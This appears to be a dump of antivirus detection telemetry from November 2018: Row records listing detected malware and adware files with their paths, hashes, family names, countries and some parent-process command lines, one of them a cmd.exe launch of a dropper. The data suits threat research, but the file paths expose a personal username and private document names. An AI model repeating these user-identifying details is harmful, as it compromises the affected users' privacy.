  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe703_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe703 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:32:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-10-30-56.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-31T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T19:50:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161828-d7ff3c74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161828-D7FF3C74', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:18:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161019-a7abbf8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161019-A7ABBF8F', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:10:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132301-4ca1e2df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132301-4CA1E2DF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:23:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0349142.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0349142.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:04:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='x64_70.exe', filepath='C:\\Users\\X\\Desktop\\bit\\Update October 1 2018\\Fast BTC miner for NVIDIA Graphics card\\X64_70.EXE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe37_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe37 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:45:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122311-fd34da19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de420089\\AVSCAN-20181104-121324-B5ABBAFE\\AVSCAN-20181104-122311-FD34DA19', filesize=976000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='66005c7e449fc923dc6cdbd380a778df8c648b4dd56ff12e7915c7aa3901bcd1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:23:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-170805-55b8f08f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-170805-55B8F08F', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='7a4205509f5c95df84746c969fbc464b569103d10cdadb44d33ba281c9d94098', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:38:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202351-adebf1aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1820c65b\\AVSCAN-20181104-202235-A6D9D9AD\\AVSCAN-20181104-202351-ADEBF1AA', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='LI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:23:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='toolregistrysearch.exe', filepath='C:\\Program Files (x86)\\WinUtilities\\ToolRegistrySearch.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8489184fb747ef927b1e1f587a634b75a3d3c4e51cce1db6dc16897205bec744', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T22:17:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fa6d90b6ca05e969b8de44c7ff1bfd9f37df0c86', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\fa6d90b6ca05e969b8de44c7ff1bfd9f37df0c86', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='c2812c2c4e8bf57f9d0ee981c2a9872a3fb82939fad2cc1442836a77f4e14f60', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:21:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055658-4f5912ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055658-4F5912EF', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202322-cb1553f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-201807-925018B6\\AVSCAN-20181104-202322-CB1553F0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:23:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='artist.exe', filepath='K:\\DISHAIN\\ARTIST\\ARTIST.exe', filesize=256000, name='W32/Drowor.#M0.#R0'), hash='b39c6fb8d2ae3356d52a251683c8efe4868bf6f882ca28d6153d60177c769842', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T08:41:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:48:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='E:\\temp\\nsqA313.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='E:\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T18:20:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T06:10:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\w3ogjzuxheq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:15:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ct.exe', filepath='G:\\CT.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gm5upd.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\gm5upd.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9bb403827bdf8c1112a659c220caaa0bef77a0c960175bdae55d23ca93973d52', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\gm5test\\gm5.exe', parentsize=888832, timestamp='2018-11-04T14:49:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055419-3fe91ae3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055419-3FE91AE3', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:54:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cc762bcc20d38fae9dd8160bcc2a77b8f24b64c0', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\S6dzS5rG.default\\cache2\\entries\\CC762BCC20D38FAE9DD8160BCC2A77B8F24B64C0', filesize=528000, name='ADWARE/Amonetize.Gen7.#M300.#R602199'), hash='1df889da173c2e7b82795aef6ca6f5bfac27746dee21ccc2b095e11b4f2cd471', metadata=Row(cmdline='-osint -url \\\\\\"https:\\\\\\/\\\\\\/www.java.com\\\\\\/en\\\\\\/download\\\\\\/\\\\\\"', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-04T13:36:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151722-e1329a6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151722-E1329A6D', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:17:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:51:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055841-594f18bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055841-594F18BC', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:58:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f88cc', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f88cc', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bootpart.exe', filepath='C:\\Program Files (x86)\\UltraISO\\drivers\\bootpart.exe', filesize=256000, name='W32/Infector.Gen8.#M300.#R700734'), hash='80d83a515b7dd7a562e476ffe00c24a46f3a8d379cda7d4ca2b6e5dbed3281a2', metadata=Row(cmdline='\\\\\\/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=248320, timestamp='2018-11-02T10:37:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\MyLogo\\PEUpdater\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='ea4aeccdcfd216a6f5343a6f947c3faeb98fa59b2b66c8cf814f0b2b8c87e0eb', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0059d02a', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp0059d02a', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:22:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptedit32.exe', filepath='I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T04:03:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130937-400b7922', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0757b1be\\AVSCAN-20181102-122516-AA7A0FE1\\AVSCAN-20181102-130937-400B7922', filesize=2048000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='f842a48fb058859b2993699fb67d1be3b511705d8f5dd5362fc3adf8c3b90e4f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202919-df7723f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d9b26c4\\AVSCAN-20181102-202904-DDE4BD09\\AVSCAN-20181102-202919-DF7723F5', filesize=1864000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='b6dc54250e9a6696d3945fbf96b38aeeb4b5bd37ab37a88200efa3bb8e88205a', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T23:30:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DeleteJobPrinter.exe", filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-193250-8f5792d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db4a7199\\AVSCAN-20181102-193045-7F92F013\\AVSCAN-20181102-193250-8F5792D8', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123304-e54f87cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a046862d\\AVSCAN-20181102-123245-E275F1EB\\AVSCAN-20181102-123304-E54F87CD', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T16:32:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='invoice_cam.doc', filepath='invoice_cam.doc', filesize=192000, name='HEUR/AGEN.1004823.#M15.#R1004823'), hash='f92e23a4882a395b3b1a1c8cd8bee63422876451f4fb0df3c6efb3829d8c5524', metadata=Row(cmdline=None, country='PA', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:35:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='c:\\users\\X\\appdata\\roaming\\qipapp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:42:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4an5be9fbzm1a8q.exe#0b2a37ab42adb266', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\v1\\20180828.185132\\30\\ShutdownTime\\4AN5BE9FBZM1A8Q.exe#0B2A37AB42ADB266', filesize=256000, name='TR/Dropper.Gen.#M300.#R4133'), hash='df638610719cad4c88a5b6d017170945481be69a65220c99df7092bb74a4f897', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:25:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsm4AA7.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installd.exe', filepath='C:\\Windows\\SysWOW64\\installd.exe', filesize=128000, name='ADWARE/Amonetize.ges.#M1.#R1'), hash='dbe316bd9fe59819848abf89caab1b764b33c6ffe65f880de8ca4700e974e3d6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='779e703f-efaf-aa21-a137-07cae611333e.exe', filepath='F:\\{68966de9-3ccd-0863-3cbc-c5dfc62c373f}\\779e703f-efaf-aa21-a137-07cae611333e.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline='\\\\\\/c \\\\\\"{68966de9-3ccd-0863-3cbc-c5dfc62c373f}\\\\\\\\779e703f-efaf-aa21-a137-07cae611333e.exe \'dld.cg0tam0roianil@mmda\\\\\\\\\'\\\\\\"', country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=232960, timestamp='2018-11-02T08:56:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbgwkajg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\nbGwkAjG.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tskill.exe', filepath='d:\\windows\\system32\\tskill.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='d03a39fa6317514fdadb9aae458b73d02ed862bc49bf05f460513af57637014a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:55:06Z'), dt=datetime.date(2018, 11, 2)),
